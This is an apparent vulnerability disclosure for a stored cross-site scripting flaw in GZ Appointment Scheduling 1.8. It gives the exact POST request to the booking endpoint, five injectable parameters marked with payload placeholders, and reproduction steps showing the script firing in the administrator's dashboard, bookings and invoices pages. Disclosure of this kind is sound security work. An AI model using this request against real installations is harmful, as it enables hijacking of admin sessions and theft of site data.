Headline
GZ Appointment Scheduling 1.8 Cross Site Scripting
GZ Appointment Scheduling version 1.8 suffers from a cross site scripting vulnerability.
┌┌───────────────────────────────────────────────────────────────────────────────────────┐││ C r a C k E r ┌┘┌┘ T H E C R A C K O F E T E R N A L M I G H T ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘ [ Vulnerability ] ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘: Author : CraCkEr :│ Website : https://gzscripts.com/php-gz-appointment-scheduling-script.html ││ Vendor : GZ Scripts ││ Software : GZ Appointment Scheduling 1.8 ││ Vuln Type: Stored XSS ││ Impact : Manipulate the content of the site ││ ││────────────────────────────────────────────────────────────────────────────────────────││ ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘: :│ Release Notes: ││ ═════════════ ││ ││ Allow Attacker to inject malicious code into website, give ability to steal sensitive ││ information, manipulate data, and launch additional attacks. ││ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘ ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09 CryptoJob (Twitter) twitter.com/0x0CryptoJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘ © CraCkEr 2023 ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘## Stored XSS-----------------------------------------------POST /PHPGZAppointment/load.php?controller=GzFront&action=step5 HTTP/1.1service_id=1&employee_id=1×lot=1688119200&lang=3&date=2023-06-30&title=mr&male=male&first_name=[XSS Payload]&second_name=[XSS Payload]&phone=[XSS Payload]&email=cracker%40infosec.com&company=xxx&address_1=[XSS Payload]&address_2=xxx&city=xxx&state=xxx&zip=xxx&country=[XSS Payload]&additional=xxx&captcha=murimy&terms=1&lang=3-----------------------------------------------POST parameter 'first_name' is vulnerable to XSSPOST parameter 'second_name' is vulnerable to XSSPOST parameter 'phone' is vulnerable to XSSPOST parameter 'address_1' is vulnerable to XSSPOST parameter 'country' is vulnerable to XSS## Steps to Reproduce:1. As a [Guest User] Choose any [Employee] & Select the Day and the Time2. Inject your [XSS Payload] in "First Name"3. Inject your [XSS Payload] in "Last Name"4. Inject your [XSS Payload] in "Phone"5. Inject your [XSS Payload] in "Address Line 1"6. Inject your [XSS Payload] in "Country"7. Accept with terms & Press [Booking] XSS Fired on Local User Browser8. When ADMIN visit [Dashboard] in Administration Panel on this Path (https://website/index.php#!/GzAdmin/home/) XSS Will Fire and Executed on his Browser9. When ADMIN visit [Bookings] - [All Booking] to check [Pending Booking] on this Path (https://website/index.php#!/GzBooking/index/) XSS Will Fire and Executed on his Browser 10. When ADMIN visit [Invoices ] - [All Invoices] to check [Pending Invoices] on this Path (https://website/index.php#!/GzInvoice/index/) XSS Will Fire and Executed on his Browser [-] Done